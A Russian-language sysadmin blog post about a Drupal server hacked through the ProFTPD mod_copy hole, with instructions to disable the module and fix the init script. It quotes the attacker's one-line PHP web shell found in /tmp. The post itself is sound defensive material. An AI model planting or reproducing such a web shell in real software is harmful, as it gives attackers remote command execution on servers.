Недавно столкнулся с ситуацией, когда сайт на
drupal взламывали из зо дня в день, на нем появлялось все больше и больше гадости рассылающих спам, и делающих прочие нехорошие вещи. На сервере установлена
ubuntu 14.04 полностью обновленная, сайт на
drupal(не лучшая cms, но это не мое дело) тоже последней версии. Ничего не предвещало беды, но я вспомнил, что
proftpd частенько падал на серваке, загуглив впроблему я выяснил, что в этом виноват скрипт запуска после ротации логов. Если кому интересно нужно открыть
/etc/init.d/proftpd, найти и изменить следующую строчку
start-stop-daemon --stop --signal $SIGNAL --quiet --pidfile
на
start-stop-daemon --stop --signal $SIGNAL --retry 1 --quiet --pidfile "$PIDFILE"
и будет все отлично, но сейчас не об этом.
В общем зайдя в каталог
/tmp я заметил 2 странных файла, которые вызывали подозрение на взлом.
1. /etc/passwd.copy, файл с данными о пользователях в
/tmp, недобрый знак.
2. <?php eval($_REQUEST[cmd]); ?> — ну это было вообще палево.
Отправился в google, и в первой же ссылки выяснил, что вирусню заливали через
proftpd.
Статья на хабре [
https://habrahabr.ru/post/257027/ ] на opennet [
https://www.opennet.ru/opennews/art.shtml?num=42015 ]
Недолго думая проверил
proftpd на уязвимость, и какое ж было мое удивление, что полностью обновленный сервер, подвержен прошлогодней дыре…
Фикса в пакетах я не нашел, поэтому просто отключил следующий модуль
mod_copy.c ведь в нем же уязвимость :-).
Для этого откройте файл
/etc/proftpd/modules.conf, найдите строчку
LoadModule mod_copy.c
и либо ее удалить либо закомментируйте
#LoadModule mod_copy.c
Не забудьте перезапустить
proftpd /etc/init.d/proftpd restart
.
Проверить отключен ли данный модуль, можно командой
proftpd -vv | grep copy
Комментарии ()